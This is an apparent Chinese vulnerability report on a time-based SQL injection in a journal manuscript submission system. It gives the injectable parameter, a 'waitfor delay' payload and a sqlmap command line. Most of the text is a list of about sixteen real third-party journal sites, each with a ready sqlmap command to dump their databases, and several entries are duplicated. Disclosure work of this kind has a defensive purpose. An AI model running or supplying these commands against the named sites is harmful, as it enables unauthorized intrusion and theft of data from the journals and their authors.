某期刊投稿系统SQL注入漏洞之一

### 简要描述： ~~总之影响众多投稿系统。。 ### 详细说明： 南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞，可获取数据库任意数据... 官网：http://www.025journal.com/ 演示系统： http://www.025journal.com/demo1/ http://www.025journal.com/demo2/ 客户案例：http://www.025journal.com/Web/CommonPage.aspx?Id=8 百度搜索： 投稿系统 技术支持:南京杰诺瀚软件 [<img src="https://images.seebug.org/upload/201410/231333002482576d93743a83e87902bffa1d0881.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/231333002482576d93743a83e87902bffa1d0881.png) ``` 注入链接：/web/CommonPage.aspx 注入参数：Id Payload：Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1);waitfor%20delay%20%270:0:5%27— SQLMAP注入命令：sqlmap -u 'http://xxxx/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch ``` ### 漏洞证明： 以官网demo作为测试案例：http://www.025journal.com/demo1/ 1、手工报错测试 http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1)-- [<img src="https://images.seebug.org/upload/201410/23133453d2cbda6c40ebac2b165cca89d5d72ddb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/23133453d2cbda6c40ebac2b165cca89d5d72ddb.png) 2、延时注入测试 http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1);waitfor%20delay%20%270:0:5%27-- 3、sqlmap注入测试 sqlmap -u 'http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch [<img src="https://images.seebug.org/upload/201410/23133555cbc71ed1c9c5153f9cc74ae81b827de0.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/23133555cbc71ed1c9c5153f9cc74ae81b827de0.png) 59个数据库，由于是时间延迟注入，获取数据的速度比较慢。。。 在线案例： （1）http://www.gjmzyfs.com/ sqlmap -u 'http://www.gjmzyfs.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1)*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch [<img src="https://images.seebug.org/upload/201410/231337026d51f8911e81d8b65105ebe14c6a0e7c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/231337026d51f8911e81d8b65105ebe14c6a0e7c.png) （2）http://sypf.cnmanu.net sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch [<img src="https://images.seebug.org/upload/201410/2313370820d47983a7de5f8c9df52b74d0a871db.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2313370820d47983a7de5f8c9df52b74d0a871db.png) （3）http://xnxyxb.cnmanu.cn/ sqlmap -u 'http://xnxyxb.cnmanu.cn/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch [<img src="https://images.seebug.org/upload/201410/231337358424d65b23a61dc587614a9bb11d155e.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/231337358424d65b23a61dc587614a9bb11d155e.png) （4）http://www.lcjsyx.com/ sqlmap -u 'http://www.lcjsyx.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch [<img src="https://images.seebug.org/upload/201410/231337473589ef89b73ab7d952cbee0e65a9c243.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/231337473589ef89b73ab7d952cbee0e65a9c243.png) （5）http://gaojian.xhnj.com/ sqlmap -u 'http://gaojian.xhnj.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （6）http://xb.cuit.edu.cn/ sqlmap -u 'http://xb.cuit.edu.cn/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （7）http://sypf.cnmanu.net/ sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （8）http://sypf.cnmanu.net/ sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （9）http://tg.fiberglass365.com/ sqlmap -u 'http://tg.fiberglass365.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （10）http://www.xnumed.com/ sqlmap -u 'http://www.xnumed.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （11）http://www.mfskin.net/ sqlmap -u 'http://www.mfskin.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （12）http://www.jsnyxb.com/ sqlmap -u 'http://www.jsnyxb.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （13）http://www.lcsjbx.com/ sqlmap -u 'http://www.lcsjbx.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （14）http://www.chinaelectrondevices.com/ sqlmap -u 'http://www.chinaelectrondevices.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （15）http://www.apsjournal.com/ sqlmap -u 'http://www.apsjournal.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*'--dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch （16）http://www.gjmzyfs.com/ sqlmap -u 'http://www.gjmzyfs.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch